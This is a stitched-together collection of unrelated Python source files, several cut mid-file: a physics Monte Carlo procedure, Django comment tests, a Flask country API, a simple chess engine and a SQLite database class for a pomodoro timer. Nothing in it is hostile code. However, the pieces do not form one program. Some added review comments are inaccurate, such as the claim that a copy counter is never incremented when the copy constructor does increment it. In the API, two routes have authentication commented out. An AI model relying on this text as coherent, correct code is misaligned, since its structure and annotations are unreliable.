            nts_block = self_config.pop('burn_in_batches')
            self_config['burn_in_blocks'] = nts_block
        # Extract the model spec.
        model_spec_config = self_config.pop('model_spec')
        model_spec = model.Spec(**model_spec_config)
        # Extract the spec of the density.
        # TODO: Implement density.
        density_est_config = self_config.pop('density_spec', None)
        if density_est_config is not None:
            # NOTE(review): density config is parsed but currently ignored.
            pass
        # Extract the spec of the static structure factor.
        ssf_est_config = self_config.pop('ssf_spec', None)
        if ssf_est_config is not None:
            ssf_est_spec = SSFEstSpec(**ssf_est_config)
        else:
            ssf_est_spec = None
        return cls(model_spec=model_spec,
                   ssf_spec=ssf_est_spec,
                   **self_config)

    def as_config(self):
        """Converts the procedure to a dictionary / mapping object."""
        # None-valued attributes are dropped from the serialized form.
        return attr.asdict(self, filter=attr.filters.exclude(type(None)))

    @cached_property
    def sampling(self) -> vmc_udf.Sampling:
        """Lazily build the concrete VMC sampling object for this procedure.

        :return: a configured vmc_udf.Sampling instance.
        """
        if self.should_eval_ssf:
            ssf_spec = self.ssf_spec
            ssf_est_spec = vmc_udf.SSFEstSpec(ssf_spec.num_modes)
        else:
            ssf_est_spec = None
        vmc_sampling = vmc_udf.Sampling(self.model_spec,
                                        self.move_spread,
                                        self.rng_seed,
                                        ssf_est_spec=ssf_est_spec)
        return vmc_sampling

    def describe_model_spec(self):
        """Log a human-readable summary of the model parameters."""
        model_spec = self.model_spec
        v_zero = model_spec.lattice_depth
        lr = model_spec.lattice_ratio
        gn = model_spec.interaction_strength
        nop = model_spec.boson_number
        sc_size = model_spec.supercell_size
        rm = model_spec.tbf_contact_cutoff
        exec_logger.info('Multi-Rods system parameters:')
        exec_logger.info(f'* Lattice depth: {v_zero / ER:.3G} ER')
        exec_logger.info(f'* Lattice ratio: {lr:.3G}')
        exec_logger.info(f'* Interaction strength: {gn / ER:.3G} ER')
        exec_logger.info(f'* Number of bosons: {nop:d}')
        exec_logger.info(f'* Supercell size: {sc_size:.3G} LKP')
        exec_logger.info(f'* Variational parameters:')
        exec_logger.info(f'  * RM: {rm:.3G} LKP')

    def build_result(self, state: vmc_udf_base.State,
                     data: SamplingData) -> ProcResult:
        """Wrap the final sampling state and data into a ProcResult.

        :param state: final state of the sampling.
        :param data: data generated during the sampling.
        :return: a ProcResult bundling state, this procedure and data.
        """
        proc = self
        return ProcResult(state, proc, data)
vmc_proc_validator = attr.validators.instance_of(Proc)
opt_vmc_proc_validator = attr.validators.optional(vmc_proc_validator)
|
<gh_stars>1-10
"""
Tests for :mod:`greenday_core.models.comment <greenday_core.models.comment>`
"""
from milkman.dairy import milkman
from django.utils import timezone
from ..models import (
User,
Project,
TimedVideoComment,
ProjectComment
)
from .base import AppengineTestBed
class TimedVideoCommentTestCase(AppengineTestBed):
    """
    Tests for :class:`greenday_core.models.comment.TimedVideoComment <greenday_core.models.comment.TimedVideoComment>`
    """

    def setUp(self):
        """
        Bootstrap test data
        """
        super(TimedVideoCommentTestCase, self).setUp()
        self.project = milkman.deliver(Project)
        self.video = self.create_video(project=self.project)
        self.user1 = milkman.deliver(User, email="<EMAIL>")
        self.user2 = milkman.deliver(User, email="<EMAIL>")

    def test_add_reply(self):
        """
        Add a reply to a comment
        """
        # Creating a root comment and a reply should each cost a fixed
        # number of queries.
        with self.assertNumQueries(5):
            root = TimedVideoComment.add_root(
                video=self.video, text="foo", user=self.user1, start_seconds=0)
        with self.assertNumQueries(5):
            reply = root.add_reply("bar", self.user2)
        # cannot reply to replies - we only allow a single level of comments
        self.assertRaises(AssertionError, reply.add_reply, "baz", None)

    def test_get_root_comments(self):
        """
        Get all root comment threads for a video
        """
        # Five root comments (each with one reply) on the video under test.
        for i in range(0, 5):
            (
                TimedVideoComment.add_root(
                    video=self.video,
                    text="foo{0}".format(i),
                    user=self.user1,
                    start_seconds=0
                ).add_reply("baz{0}".format(i), user=self.user1)
            )
        # add some comments to another video; these must not be returned
        other_video = self.create_video(project=self.project)
        for i in range(0, 5):
            TimedVideoComment.add_root(
                video=other_video,
                text="bar{0}".format(i),
                user=self.user1,
                start_seconds=0)
        with self.assertNumQueries(2):
            video_comments = list(TimedVideoComment.get_root_comments_for(
                self.video))
        self.assertEqual(5, len(video_comments))
        # prefetch_replies should not change the query count here.
        with self.assertNumQueries(2):
            video_comments = TimedVideoComment.get_root_comments_for(
                self.video, prefetch_replies=True)
        self.assertEqual(5, len(video_comments))

    def test_created_modified_updated(self):
        """
        Check that created and modified dates are updated correctly
        """
        # because these are quite important for comments
        start = timezone.now()
        root = TimedVideoComment.add_root(
            video=self.video, text="foo", user=self.user1, start_seconds=0)
        self.assertGreater(root.created, start)
        self.assertGreater(root.modified, start)
        created, modified = root.created, root.modified
        root.save()
        # Saving again keeps `created` but bumps `modified`.
        self.assertEqual(created, root.created)
        self.assertGreater(root.modified, modified)
class ProjectCommentTestCase(AppengineTestBed):
    """
    Tests for :class:`greenday_core.models.comment.ProjectComment <greenday_core.models.comment.ProjectComment>`
    """

    def setUp(self):
        """
        Bootstrap test data
        """
        super(ProjectCommentTestCase, self).setUp()
        self.project = milkman.deliver(Project)
        self.user1 = milkman.deliver(User, email="<EMAIL>")
        self.user2 = milkman.deliver(User, email="<EMAIL>")

    def test_add_reply(self):
        """
        Add a comment reply
        """
        with self.assertNumQueries(5):
            root = ProjectComment.add_root(
                project=self.project, text="foo", user=self.user1)
        # NOTE: one query fewer than the TimedVideoComment equivalent.
        with self.assertNumQueries(4):
            reply = root.add_reply("bar", self.user2)
        # cannot reply to replies - we only allow a single level of comments
        self.assertRaises(AssertionError, reply.add_reply, "baz", None)

    def test_get_root_comments(self):
        """
        Get all root comment thread for a project
        """
        # Five root comments (each with one reply) on the project under test.
        for i in range(0, 5):
            (
                ProjectComment.add_root(
                    project=self.project,
                    text="foo{0}".format(i),
                    user=self.user1,
                ).add_reply("baz{0}".format(i), user=self.user1)
            )
        # add some comments to another project; these must not be returned
        other_project = milkman.deliver(Project)
        for i in range(0, 5):
            ProjectComment.add_root(
                project=other_project,
                text="bar{0}".format(i),
                user=self.user1)
        with self.assertNumQueries(1):
            project_comments = list(ProjectComment.get_root_comments_for(
                self.project))
        self.assertEqual(5, len(project_comments))
        # prefetch_replies should not change the query count here.
        with self.assertNumQueries(1):
            project_comments = ProjectComment.get_root_comments_for(
                self.project, prefetch_replies=True)
        self.assertEqual(5, len(project_comments))

    def test_created_modified_updated(self):
        """
        Check that created and modified dates are updated correctly
        """
        # because these are quite important for comments
        start = timezone.now()
        root = ProjectComment.add_root(
            project=self.project, text="foo", user=self.user1)
        self.assertGreater(root.created, start)
        self.assertGreater(root.modified, start)
        created, modified = root.created, root.modified
        root.save()
        # Saving again keeps `created` but bumps `modified`.
        self.assertEqual(created, root.created)
        self.assertGreater(root.modified, modified)
|
<gh_stars>0
from pgs_api import app
from flask import request, jsonify
from pgs_api.models.plan import Plan
from pgs_api.models.plan import PlanService
from pgs_api.models.country import Country, CountryService
from pgs_api.extensions.jsonp import enable_jsonp
from pgs_api.extensions.error_handling import ErrorResponse
from pgs_api.extensions.error_handling import SuccessResponse
from flask_jwt import jwt_required, current_identity
import uuid
import mongoengine
import re
import pymongo
# --------------------------------------------------------------------------
# GET: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['GET'])
@jwt_required()
@enable_jsonp
def get_country_by_id(country_id):
    """Return the country identified by ``country_id`` as JSON.

    Responds with an error payload when the id is unknown or the lookup
    fails.
    """
    try:
        service = CountryService(country_id)
        data = service.get_country()
        if data:
            return jsonify(data)
        # Fixed copy/paste in the message: this endpoint serves countries,
        # not plans.
        return ErrorResponse('Country not found', 'The provided country_id is not valid').as_json()
    except Exception:
        # `except Exception` instead of a bare except so SystemExit and
        # KeyboardInterrupt are not swallowed.
        app.logger.error('Failed to get country: %s', country_id)
        return ErrorResponse('Could not get', 'Invalid data provided').as_json()
# --------------------------------------------------------------------------
# POST: /country
# --------------------------------------------------------------------------
# Registers a new country in the system using pgs_api Identity Sub-System
@app.route('/api/v1/country', methods=['POST'])
@jwt_required()
@enable_jsonp
def post_country():
    """Create a new country from the JSON request body.

    Expects a JSON object with a ``name`` field; responds with the generated
    country_id on success.
    """
    data = request.get_json()
    if data:
        try:
            res = Country(
                country_id=str(uuid.uuid4()),
                name=data['name'],
            )
            # NOTE(review): validate=False skips mongoengine document
            # validation -- confirm this is intentional.
            res.save(validate=False)
            app.logger.info('Country %s was created', res.country_id)
            return SuccessResponse(res.country_id, 'Country created successfully', 'n/a').as_json()
        except KeyError:
            # Body was JSON but lacked the required "name" field; the
            # original let this surface as an unhandled 500.
            return ErrorResponse('Missing field', 'The "name" field is required').as_json()
        except mongoengine.errors.NotUniqueError:
            # Fixed typo in the user-facing message ("registred").
            return ErrorResponse('Name is already registered', data['name']).as_json()
    return ErrorResponse('Error processing request', 'The provided data country is not valid').as_json()
# --------------------------------------------------------------------------
# PUT: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['PUT'])
@jwt_required()
@enable_jsonp
def put_country(country_id):
    """Update the country identified by ``country_id`` with the JSON body."""
    try:
        data = request.get_json()
        service = CountryService(country_id)
        country = service.get_country()
        if country.update_country(data):
            app.logger.info('Updated country_id: %s', country_id)
            return SuccessResponse('Success', 'Updated successfully', 'UPDATE_OK').as_json()
        # Bug fix: the original fell through with no return value here, so a
        # failed update made Flask raise "view did not return a response".
        return ErrorResponse('Could not update', 'Update was not applied').as_json()
    except Exception:
        # Narrowed from a bare except so process-control exceptions escape.
        app.logger.error('Invalid json received for country: %s', country_id)
        return ErrorResponse('Could not update', 'Invalid data provided').as_json()
# --------------------------------------------------------------------------
# PUT: /country/<uid>/status
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>/status', methods=['PUT'])
#@jwt_required()
@enable_jsonp
def update_country_status(country_id):
    """Update the status flag of the country ``country_id``.

    NOTE(review): authentication is commented out on this route -- confirm
    that is intentional before shipping.
    """
    try:
        service = CountryService(country_id)
        country = service.get_country()
        if country.update_status():
            app.logger.info('Updated status for country_id: %s', country_id)
            return SuccessResponse('Success', 'Status updated successfully', 'STATUS_OK').as_json()
        # Bug fix: explicit error response instead of an implicit None
        # return (which made Flask raise a 500) when the update fails.
        return ErrorResponse('Could not update status', 'Status update was not applied').as_json()
    except Exception:
        # Narrowed from a bare except so process-control exceptions escape.
        app.logger.error('Invalid json received for country: %s', country_id)
        return ErrorResponse('Could not update status', 'Invalid status provided').as_json()
# --------------------------------------------------------------------------
# GET: /country/countries
# --------------------------------------------------------------------------
@app.route('/api/v1/country/countries/', defaults={'term':''}, methods=['GET'])
@app.route('/api/v1/country/countries/<term>', methods=['GET'])
#@jwt_required()
@enable_jsonp
def get_all_countries(term):
    """List all countries, optionally filtered by the ``term`` path segment.

    NOTE(review): authentication is commented out on this route -- confirm.
    """
    # NOTE(review): the class itself is used here, not an instance -- this
    # assumes get_countries is a classmethod/staticmethod; verify against
    # CountryService.
    service = CountryService
    data = service.get_countries(term)
    if data:
        return jsonify(data)
    return ErrorResponse('Countries not found', 'Countries collections is empty').as_json()
# --------------------------------------------------------------------------
# DELETE: /country/<uid>
# --------------------------------------------------------------------------
@app.route('/api/v1/country/<country_id>', methods=['DELETE'])
@jwt_required()
@enable_jsonp
def delete_country(country_id):
    """Delete the country identified by ``country_id``."""
    try:
        service = CountryService(country_id)
        deleted = service.delete()
        if deleted:
            app.logger.info('Delete country_id: %s', country_id)
            return SuccessResponse('Success', 'Delete successfully', 'DELETE_OK').as_json()
        # Bug fix: explicit error response instead of an implicit None
        # return (which made Flask raise a 500) when the delete fails.
        return ErrorResponse('Could not delete country_id', 'Country was not deleted').as_json()
    except Exception:
        # Narrowed from a bare except; also fixed the copy/pasted
        # "company" in the log message.
        app.logger.error('Invalid json received for country: %s', country_id)
        return ErrorResponse('Could not delete country_id', 'Invalid country_id provided').as_json()
<reponame>nilthehuman/Hex
import sys
import time
import copy
import math
from itertools import chain
COPY_COUNTER = 0
class Square:
    """A coordinate on the 8x8 board; supports vector-style arithmetic."""

    # Default (off-board) coordinates.
    x = -1
    y = -1

    def __init__(self, x, y):
        self.x, self.y = x, y

    #def __init__(self, algebraic):
    #    self.x, self.y = algebraic_to_square(algebraic[0], algebraic[1])

    def __str__(self):
        # Bug fix: the original referenced the bare names x/y, which raise
        # NameError at runtime -- class attributes are not in method scope.
        return square_to_algebraic(self.x, self.y)

    def __neg__(self):
        return Square(-self.x, -self.y)

    def __add__(self, other):
        return Square(self.x + other.x, self.y + other.y)

    def __sub__(self, other):
        return Square(self.x - other.x, self.y - other.y)
# more or less standard piece value heuristics
PIECE_VALUES = {
    ' ' : 0.0,   # empty square
    'P' : 1.0,   # pawn
    'N' : 3.0,   # knight
    'B' : 3.25,  # bishop valued slightly above knight
    'R' : 5,     # rook
    'Q' : 9.5,   # queen
    'K' : 100    # king: effectively infinite
}

def piece_value(piece):
    """Return the heuristic value of a piece letter (accepts either case)."""
    return PIECE_VALUES[piece.upper()]
# what the game looks like at the moment
# no castling, no en passant
class Position:
    """Mutable board state: piece placement, side to move and last-move info.

    Uppercase letters are white pieces, lowercase are black, ' ' is empty.
    """

    def reset(self):
        # Clear all state; board becomes a list of rank lists of piece chars.
        self.board = []
        self.color = ''          # side to move: 'w' or 'b'
        self.last_move = None    # (sq_from, sq_to) of the previous move
        self.last_taken = None   # piece captured by the previous move
        self.optimal_move = None
        self.score = None

    def __init__(self, other=None):
        """Create an empty position, or a deep copy of ``other``."""
        if other is None:
            self.reset()
        else:
            # Count copies made, for profiling the search.
            global COPY_COUNTER
            COPY_COUNTER += 1
            self.board = copy.deepcopy(other.board)
            self.color = other.color
            self.last_move = other.last_move
            self.last_taken = other.last_taken
            self.optimal_move = None
            self.score = None

    @classmethod
    def from_fen(cls, fen, color):
        """Build a position from the piece-placement field of a FEN string.

        :param fen: ranks separated by '/'; a digit encodes that many
            consecutive empty squares.
        :param color: side to move, 'w' or 'b'.
        """
        pos = Position()
        pos.color = color
        for rank in fen.split('/'):
            pos.board.append([])
            for square in rank:
                if square.isdigit():
                    for _ in range(int(square)):
                        pos.board[-1].append(' ')
                else:
                    pos.board[-1].append(square)
        return pos

    def __str__(self):
        # One text row per rank, ranks joined by newlines.
        rows = list(map(lambda x: ''.join(x), self.board))
        show_board = '\n'.join(rows)
        show_pos = show_board #+ "\nscore: %0.2f\noptimal_move: %s" % (self.score, move_to_algebraic(self.optimal_move))
        return show_pos

    def flip_color(self):
        # Toggle the side to move.
        if self.color == 'w':
            self.color = 'b'
        else:
            self.color = 'w'

    def whose_man(self, square):
        # Delegates to the module-level helper on the piece at `square`.
        return whose_man(self.board[square.y][square.x], self.color)

    def make_move(self, move):
        """Apply ``move`` (a (sq_from, sq_to) pair) and flip the side to move.

        It is the caller's responsibility to provide a legal move!
        """
        sq_from, sq_to = move
        # Remember enough state for a single-level undo.
        self.last_move = move
        self.last_taken = self.board[sq_to.y][sq_to.x]
        # pawn promotion? (white pawn reaching rank 0, black reaching rank 7)
        if self.board[sq_from.y][sq_from.x] == 'P' and sq_to.y == 0 or self.board[sq_from.y][sq_from.x] == 'p' and sq_to.y == 7:
            # Always auto-promote to a queen of the moving side.
            self.board[sq_to.y][sq_to.x] = 'Q' if sq_to.y == 0 else 'q'
            self.board[sq_from.y][sq_from.x] = ' '
        else:
            self.board[sq_to.y][sq_to.x] = self.board[sq_from.y][sq_from.x]
            self.board[sq_from.y][sq_from.x] = ' '
        self.flip_color()

    def unmake_last_move(self):
        """Undo the move applied by the most recent make_move call.

        NOTE(review): promotions are not undone (the queen is moved back
        instead of restoring the pawn) -- the placeholder branch below never
        runs. Only one level of undo is possible.
        """
        sq_from, sq_to = self.last_move
        if False:
            # pawn unpromotion???
            assert False
        else:
            self.board[sq_from.y][sq_from.x] = self.board[sq_to.y][sq_to.x]
            self.board[sq_to.y][sq_to.x] = self.last_taken
        self.last_move = None
        self.last_taken = None
        self.flip_color()
#### #### #### #### ####
def whose_man(piece, color):
    """Return 1 for a white (uppercase) piece, -1 for black, 0 for empty.

    The ``color`` argument is accepted for signature compatibility with the
    other helpers but does not affect the result.
    """
    if piece == ' ':
        return 0
    return 1 if piece.isupper() else -1
def turn_to_move(piece, color):
    """True iff ``piece`` belongs to the side ``color`` ('w'/'b') to move.

    Empty squares never belong to the side to move.
    """
    return piece != ' ' and piece.isupper() == (color == 'w')
def square_available_for_take(square, color):
    """True iff ``square`` is on the board and holds an enemy piece of
    ``color`` ('w'/'b').

    NOTE(review): reads the module-global ``pos`` rather than taking the
    position as a parameter -- callers must ensure a global Position named
    ``pos`` exists; confirm this is intended.
    """
    x, y = square.x, square.y
    # Off-board squares are never available.
    if x < 0 or x > 7 or y < 0 or y > 7:
        return False
    if pos.board[y][x] == ' ':
        return False
    # An enemy piece has the opposite letter case to the given side.
    return pos.board[y][x].islower() == (color == 'w')
def square_available_for_quiet_move(square, color):
    """True iff ``square`` is on the board and empty.

    NOTE(review): like square_available_for_take, this reads the
    module-global ``pos``; the ``color`` parameter is unused here and kept
    for signature symmetry.
    """
    x, y = square.x, square.y
    # Off-board squares are never available.
    if x < 0 or x > 7 or y < 0 or y > 7:
        return False
    return pos.board[y][x] == ' '
def get_takes(pos, square):
    """Return all capturing moves for the piece on ``square`` in ``pos``."""
    return get_moves(pos, square, square_available_for_take, take=True)
def get_quiet_moves(pos, square):
    """Return all non-capturing moves for the piece on ``square`` in ``pos``."""
    return get_moves(pos, square, square_available_for_quiet_move, take=False)
def get_moves(pos, square, square_available, take):
    """List pseudo-legal moves for the piece standing on *square* in *pos*.

    square_available -- predicate (square, color) -> bool selecting
        destinations: pass the "take" variant for captures, the "quiet"
        variant otherwise.
    take -- True to generate captures, False to generate quiet moves.

    Returns a list of (from_square, to_square) pairs.  No check/legality
    filtering is performed here.
    """
    moves = []
    x, y = square.x, square.y
    if pos.board[y][x] == ' ':
        return []
    # pawns are funky, define movement explicitly
    elif pos.board[y][x] == 'p':
        # Black pawn moves toward increasing y.
        # NOTE(review): reads pos.board[y+1] without a bounds check; this
        # assumes a pawn can never stand on its last rank (promotion
        # replaces it with a queen in make_move) -- confirm.
        if take:
            if x < 7 and pos.board[y+1][x+1].isupper():
                # take to the left
                moves.append((square, Square(x+1, y+1)))
            if x > 0 and pos.board[y+1][x-1].isupper():
                # take to the right
                moves.append((square, Square(x-1, y+1)))
        else:
            if pos.board[y+1][x] == ' ':
                # not blocked
                moves.append((square, Square(x, y+1)))
                if y == 1 and pos.board[y+2][x] == ' ':
                    # two squares from initial position
                    moves.append((square, Square(x, y+2)))
    elif pos.board[y][x] == 'P':
        # White pawn moves toward decreasing y (mirror of the above).
        if take:
            if x > 0 and pos.board[y-1][x-1].islower():
                # take to the left
                moves.append((square, Square(x-1, y-1)))
            if x < 7 and pos.board[y-1][x+1].islower():
                # take to the right
                moves.append((square, Square(x+1, y-1)))
        else:
            if pos.board[y-1][x] == ' ':
                # not blocked
                moves.append((square, Square(x, y-1)))
                if y == 6 and pos.board[y-2][x] == ' ':
                    # two squares from initial position
                    moves.append((square, Square(x, y-2)))
    # --- regular pieces ---
    elif pos.board[y][x].upper() == 'N':
        # Knight: all eight (±1, ±2) / (±2, ±1) jumps.
        for dx in [-1, 1]:
            for dy in [-2, 2]:
                candidate_square = Square(x+dx, y+dy)
                if square_available(candidate_square, pos.color):
                    moves.append((square, candidate_square))
        for dx in [-2, 2]:
            for dy in [-1, 1]:
                candidate_square = Square(x+dx, y+dy)
                if square_available(candidate_square, pos.color):
                    moves.append((square, candidate_square))
    elif pos.board[y][x].upper() == 'B':
        # Bishop: slide along each diagonal over empty squares; the first
        # non-empty (or off-board) square is then tested for a capture.
        for delta in [Square(-1, -1), Square(-1, 1), Square(1, -1), Square(1, 1)]:
            candidate_square = square + delta
            while square_available_for_quiet_move(candidate_square, pos.color):
                if not take:
                    moves.append((square, candidate_square))
                candidate_square += delta
            if square_available(candidate_square, pos.color):
                moves.append((square, candidate_square))
    elif pos.board[y][x].upper() == 'R':
        # Rook: same sliding scheme along ranks and files.
        for delta in [Square(0, -1), Square(-1, 0), Square(0, 1), Square(1, 0)]:
            candidate_square = square + delta
            while square_available_for_quiet_move(candidate_square, pos.color):
                if not take:
                    moves.append((square, candidate_square))
                candidate_square += delta
            if square_available(candidate_square, pos.color):
                moves.append((square, candidate_square))
    elif pos.board[y][x].upper() == 'Q':
        # a combination of B + R
        # Temporarily rewrite the queen as a bishop, then a rook, and
        # recurse; the original piece is restored afterwards.
        orig_piece = pos.board[y][x]
        pos.board[y][x] = 'B' if orig_piece.isupper() else 'b'
        moves = get_moves(pos, square, square_available, take)
        pos.board[y][x] = 'R' if orig_piece.isupper() else 'r'
        moves += get_moves(pos, square, square_available, take)
        pos.board[y][x] = orig_piece
    elif pos.board[y][x].upper() == 'K':
        # King: one step in any direction.  dx == dy == 0 yields the
        # king's own square, which both availability predicates reject.
        for dx in range(-1, 2):
            for dy in range(-1, 2):
                candidate_square = Square(x+dx, y+dy)
                if square_available(candidate_square, pos.color):
                    moves.append((square, candidate_square))
    else:
        assert False
    return moves
#### #### #### #### ####
def gen_all_moves(pos, take=False):
    """Yield every move for the side to move in *pos*.

    Yields captures when *take* is True, quiet moves otherwise.
    """
    for y in range(8):
        for x in range(8):
            if not turn_to_move(pos.board[y][x], pos.color):
                continue
            origin = Square(x, y)
            if take:
                yield from get_takes(pos, origin)
            else:
                yield from get_quiet_moves(pos, origin)
def minimax(pos, alpha, beta, depth): # depth is in plies
    """Alpha-beta minimax search; returns *pos* with .score and .optimal_move set.

    At depth < 1 the static evaluation score() is used.  Captures are
    generated before quiet moves.  White maximises, black minimises.

    NOTE(review): the cutoff test is `alpha > beta` (not `>=`), and a
    cutoff `break` skips the trailing unmake_last_move() -- confirm both
    are intentional.
    """
    if depth < 1:
        # call heuristic evaluation
        pos.score = score(pos)
        #print(pos, file=sys.stderr, flush=True)
        return pos
    # zugzwang does not exist, so a move can only improve the position
    optimal_move = None
    optimal_score = alpha if pos.color == 'w' else beta
    opt = max if pos.color == 'w' else min
    # avoid copying the entire board array every time
    new_pos = Position(pos)
    all_moves = chain(gen_all_moves(pos, take=True), gen_all_moves(pos, take=False))
    for move in all_moves:
        new_pos.make_move(move)
        new_score = opt(optimal_score, minimax(new_pos, alpha, beta, depth-1).score)
        # improvement?
        if pos.color == 'w' and optimal_score < new_score:
            optimal_move = move
            optimal_score = new_score
            alpha = max(alpha, new_score)
        elif pos.color == 'b' and optimal_score > new_score:
            optimal_move = move
            optimal_score = new_score
            beta = min(beta, new_score)
        if alpha > beta:
            break
        new_pos.unmake_last_move()
    pos.optimal_move = optimal_move
    pos.score = optimal_score
    return pos
def test_minimax():
    """Placeholder smoke test for minimax; builds a tiny board and stops there."""
    pos = Position()
    pos.board = [[' ', ' ']]
#### #### #### #### ####
def first_move(pos):
    """Pick an opening move: advance a pawn to open a diagonal for a bishop.

    For white the first candidate is played directly; for black each
    candidate is evaluated with a shallow minimax and the best-scoring
    move is returned.  Always returns a (from_square, to_square) pair.
    """
    bishops = []
    for y in range(8):
        for x in range(8):
            if (pos.board[y][x] == 'B' and pos.color == 'w' or
                    pos.board[y][x] == 'b' and pos.color == 'b'):
                bishops.append(Square(x, y))
    candidates = []
    for b in bishops:
        # Push the pawn diagonally adjacent to the bishop one square
        # toward the centre.
        dx = 1 if b.x < 4 else -1
        y = 6 if pos.color == 'w' else 1
        new_y = 5 if pos.color == 'w' else 2
        candidates.append((Square(b.x+dx, y), Square(b.x+dx, new_y)))
    if pos.color == 'w':
        return candidates[0]
    # BUG FIX 1: the evaluation key previously called
    # minimax(Position(), ...), ignoring the candidate entirely, so every
    # key was identical and the choice was arbitrary.  Score the candidate
    # position itself instead.
    # BUG FIX 2: this branch previously returned a Position while the
    # white branch (and the caller, via move_to_algebraic) expects a move;
    # return the candidate move whose resulting position scores best.
    scored = []
    for move in candidates:
        pos.make_move(move)
        cand_pos = Position(pos)
        pos.unmake_last_move()
        scored.append((minimax(cand_pos, -1000, 1000, 1).score, move))
    opt = max if pos.color == 'w' else min
    return opt(scored, key=lambda entry: entry[0])[1]
#### #### #### #### ####
def algebraic_to_square(algebraic):
    """Convert algebraic notation like 'e4' to board coordinates (x, y).

    x grows from file 'a' to 'h'; y grows from rank 8 down to rank 1.
    """
    file_ch, rank_ch = algebraic[0], algebraic[1]
    return (ord(file_ch) - ord('a'), ord('8') - ord(rank_ch))
def square_to_algebraic(x, y):
    """Convert board coordinates (x, y) to algebraic notation like 'e4'."""
    return chr(ord('a') + x) + chr(ord('8') - y)
def move_to_algebraic(move):
    """Render a (from, to) square pair as e.g. 'e2e4'; None passes through."""
    if move is None:
        return None
    return (square_to_algebraic(move[0].x, move[0].y)
            + square_to_algebraic(move[1].x, move[1].y))
def score_material(pos):
    """Sum signed piece values over the board (positive favours white).

    Relies on the module-level whose_man() for the sign and piece_value()
    for the magnitude.
    """
    # The original accumulated into a local named `sum`, shadowing the
    # builtin; use the builtin sum over a generator instead.
    return sum(whose_man(square, pos.color) * piece_value(square)
               for rank in pos.board
               for square in rank)
# optimization results will go here:
# Tuned evaluation weights keyed by term name; empty until tuning is run.
TUNED_WEIGHTS = {}
def score_threats(pos):
    """Threat-based evaluation term; not implemented yet, always 0."""
    return 0
def score_position(pos):
    """Positional evaluation term; not implemented yet, always 0."""
    return 0
def score(pos):
    """Static evaluation: unit-weighted sum of material, threat and positional terms."""
    material = score_material(pos)
    threats = score_threats(pos)
    position = score_position(pos)
    return 1 * material + 1 * threats + 1 * position
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
# Protocol: a block of named constants first, then one position per turn
# on stdin; we answer with a move in long algebraic notation on stdout.
constants_count = int(input())
for i in range(constants_count):
    name, value = input().split()
    # print("name=%s, value=%s" % (name, value), file=sys.stderr, flush=True)
# Request positions in FEN format.
print("fen")
# game loop
while True:
    # NOTE(review): COPY_COUNTER is reset here but never incremented in
    # this file -- the "copies made" log below always prints 0 unless the
    # Position copy constructor updates it elsewhere; confirm.
    COPY_COUNTER = 0
    inputs = input().split()
    start_time = time.time_ns()
    pos = Position.from_fen(inputs[0], inputs[1])
    # use 'moves' and 'lastmove' perhaps?
    # the following input fields are unimportant
    castling = inputs[2]
    en_passant = inputs[3]
    half_move_clock = int(inputs[4])
    full_move = int(inputs[5])
    all_moves = gen_all_moves(pos)
    print(list(map(move_to_algebraic, all_moves)), file=sys.stderr, flush=True)
    # 2-ply alpha-beta search from the current position.
    best = minimax(pos, -1000, 1000, 2)
    print(best, file=sys.stderr, flush=True)
    #print("score: %0.2f" % score_material(pos), file=sys.stderr, flush=True)
    if full_move == 1:
        print(move_to_algebraic(first_move(pos)))
    elif best.optimal_move is None:
        print("random")
    else:
        print(move_to_algebraic(best.optimal_move))
    print("copies made: %d" % COPY_COUNTER, file=sys.stderr, flush=True)
    print("time used: %d microsecs" % ((time.time_ns() - start_time) / (10**3)), file=sys.stderr, flush=True)
# --- file boundary (concatenation artifact) ---
import sqlite3 as sql
import cumodoro.config as config
from cumodoro.error import DatabaseError
from collections import deque
import datetime
import sys
import logging
log = logging.getLogger('cumodoro')
class Task():
    """Plain attribute container for one task row (fields assigned dynamically)."""
class Database():
    """SQLite-backed persistence for cumodoro tasks, pomodoros and config.

    Lazily opens a single connection (autocommit: isolation_level=None)
    and caches the task tree (tasks, task_list, colors, task_chain) in
    memory after load_tasks().
    """
    def __init__(self):
        # Connection / cursor are created lazily in connect().
        self.db = None
        self.cursor = None
        self.tasks = None
        self.full_task_list = {}
        self.task_list = {}
        self.task_chain = {None:[]}
        self.has_savepoint = False
    def connect(self):
        """Open the SQLite connection if not already open; exits on failure."""
        if self.db == None:
            try:
                self.db = sql.connect(config.DATABASE, detect_types=sql.PARSE_DECLTYPES|sql.PARSE_COLNAMES, check_same_thread=False)
                self.db.isolation_level = None
                self.cursor = self.db.cursor()
                self.has_savepoint = False
            except sql.Error as e:
                print("Error:",e)
                sys.exit(1)
    def disconnect(self):
        """Close the connection if open; exits on failure."""
        if self.db != None:
            try:
                self.db.close()
                self.db = None
                self.cursor = None
            except sql.Error as e:
                print("Error:",e)
                sys.exit(1)
    def commit(self):
        """Commit the current transaction; refuses while a savepoint is held."""
        try:
            if self.has_savepoint:
                raise DatabaseError("Savepoint not released")
            self.db.commit()
        except sql.Error as e:
            print("Error:",e)
            sys.exit(1)
    def execute(self,query,params = None,immediate=True):
        """Execute *query* (optionally with a tuple of *params*).

        Commits immediately unless immediate=False.  Raises DatabaseError
        on a non-string query or non-tuple params.
        """
        if self.db == None:
            self.connect()
        if isinstance(query,str) and ( params == None or isinstance(params,tuple) ):
            if isinstance(params,tuple):
                self.cursor.execute(query,params)
            else:
                self.cursor.execute(query)
            if immediate:
                self.commit()
        else:
            raise DatabaseError("parameter missmatch: string != "+str(type(query)))
    def request(self,query,params = None):
        """Execute *query* and return all fetched rows."""
        if self.db == None:
            self.connect()
        self.execute(query,params)
        result = self.cursor.fetchall()
        return result
    def create(self):
        """Create the schema (tasks, pomodoros, config) and seed defaults."""
        self.connect()
        try:
            self.cursor.execute("""
            CREATE TABLE IF NOT EXISTS tasks (
                id INTEGER PRIMARY KEY,
                desc TEXT NOT NULL,
                color INTEGER DEFAULT 0,
                active INTEGER DEFAULT 1,
                task INTEGER,
                note TEXT
            )""")
            self.cursor.execute("""
            CREATE TABLE IF NOT EXISTS pomodoros (
                id INTEGER PRIMARY KEY,
                time TIMESTAMP NOT NULL,
                duration INTEGER NOT NULL,
                task INTEGER
            )""")
            self.cursor.execute("""
            CREATE TABLE IF NOT EXISTS config (
                variable TEXT PRIMARY KEY NOT NULL,
                value TEXT
            )""")
            # Disabled developer fixture data; kept for reference.
            if False:
                # remove these:
